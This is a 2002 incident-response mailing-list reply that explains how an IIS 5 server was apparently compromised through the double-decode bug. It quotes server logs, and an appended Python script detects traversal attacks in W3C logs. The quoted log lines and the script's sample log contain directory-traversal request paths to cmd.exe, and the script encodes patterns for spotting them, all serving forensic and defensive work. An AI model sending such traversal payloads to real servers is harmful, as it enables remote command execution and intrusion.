From: Matt Scarborough (vexversa_at_verizon.net)
Date: Thu Jul 11 2002 - 23:25:54 CDT
On Thu, 11 Jul 2002 10:09:28 -0500, "Matt Andreko" wrote
> I have been asked by many to see the logs. I have also posted them to
> the website at http://www.criminalsmostly.com/~mandreko/logs.zip (didn't
> want to post a really really long post)
>
> I appreciate all the responses I'm getting, I'm finding out more that I
> did not know about this little file. I'm mainly trying to figure out
> how it got there, and where it came from.
On an unrelated note, this server is Windows 2000 and not vulnerable to the
HK.EXE exploit (patched by MS00-003.) Richard Bartlett's descriptions of the
toolkit seem a likely explanation.

As to how cc.exe got there, the logs referenced above show the server
vulnerable to the double-decode bug (patched by MS01-026.)

For example

http://

will leave a 200 response from IIS 5 in the logs and actually transfer the
file CMD.EXE to the attacker. This behavior is a change from the Unicode bug
(patched by MS00-086) which would have returned a directory listing to the
attacker.

Additionally, the familiar

http://

will leave a 502 response from IIS 5 in the logs, and output to the attacker

CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
1 file(s) copied.

The attack URLs above sent to a double-decode bug vulnerable server are
consistent with your ex020522.log

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-05-22 12:05:49
#Fields: time c-ip cs-method cs-uri-stem sc-status
<snip>
12:05:49 212.179.250.122 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:05:52 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 200
12:06:55 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:07:20 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:10:51 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502

As such, the attack URL

http://

could have transferred the file cc.exe to the victim server using TFTP.
Since you are not logging cs-uri-queries we may not be sure what commands
successfully returned the 200 or 502 responses.

As preliminary guesswork only, most of the other logs indicate automated
tools (several requests within the span of a second or two.) The compromise
*seems* to have been mounted from the same ADSL netblock. Inspection of the
logs *seems* to reveal an automated tool first, run on two successive days,
followed by manual attack --- all originating from that same IP block.

Matt Scarborough 2002-07-12
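As an added example (not part of the original mail), the Python below parses a W3C extended log like the ex020522.log excerpt above, decodes cs-uri-stem twice the way an MS01-026-vulnerable server would so that %255c-style encodings are caught as well as %5c, flags traversal requests reaching cmd.exe regardless of sc-status (the mail shows a 502 that still copied a file), and lists client IPs whose request timing suggests an automated tool. The sample log is constructed: RFC 5737 addresses, and the %255c line is added to exercise the second decoding pass.

```python
from datetime import datetime
from urllib.parse import unquote

# Constructed sample modelled on the quoted ex020522.log; RFC 5737 addresses, %255c line added.
SAMPLE_LOG = """\
#Fields: time c-ip cs-method cs-uri-stem sc-status
12:05:49 192.0.2.10 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:05:50 192.0.2.10 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 200
12:05:51 192.0.2.10 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe 502
12:12:03 198.51.100.4 GET /default.htm 200
"""

def parse_w3c(text):
    """One dict per data line, keyed by the names in the #Fields header."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            records.append(dict(zip(fields, line.split())))
    return records

def decode_like_iis(stem, passes=2):
    """Decode `passes` times (MS01-026 decoded a second time after the path check,
    so %255c survives the check and only then becomes '\\'); return (path, pass exposing '..')."""
    first_hit = None
    for n in range(1, passes + 1):
        stem = unquote(stem)
        if first_hit is None and ("../" in stem or "..\\" in stem):
            first_hit = n
    return stem.replace("\\", "/").lower(), first_hit

def traversal_hits(records):
    """(time, ip, status, pass) for traversal reaching cmd.exe. sc-status is not a
    filter: the mail shows a 502 whose body was '1 file(s) copied.'"""
    out = []
    for r in records:
        path, hit = decode_like_iis(r["cs-uri-stem"])
        if hit and path.endswith("/cmd.exe"):
            out.append((r["time"], r["c-ip"], r["sc-status"], hit))
    return out

def burst_ips(records, window=2.0, min_hits=3):
    """IPs with >= min_hits requests inside `window` seconds (tool-like); assumes
    the log is chronological, as IIS writes it."""
    by_ip = {}
    for r in records:
        by_ip.setdefault(r["c-ip"], []).append(datetime.strptime(r["time"], "%H:%M:%S"))
    return {ip for ip, ts in by_ip.items()
            if any((ts[i + min_hits - 1] - ts[i]).total_seconds() <= window
                   for i in range(len(ts) - min_hits + 1))}
```

Run `traversal_hits(parse_w3c(SAMPLE_LOG))` to see which pass exposed each traversal; a pass value of 2 is the double-decode signature, since a server patched for MS01-026 would never reach that decoding.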
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com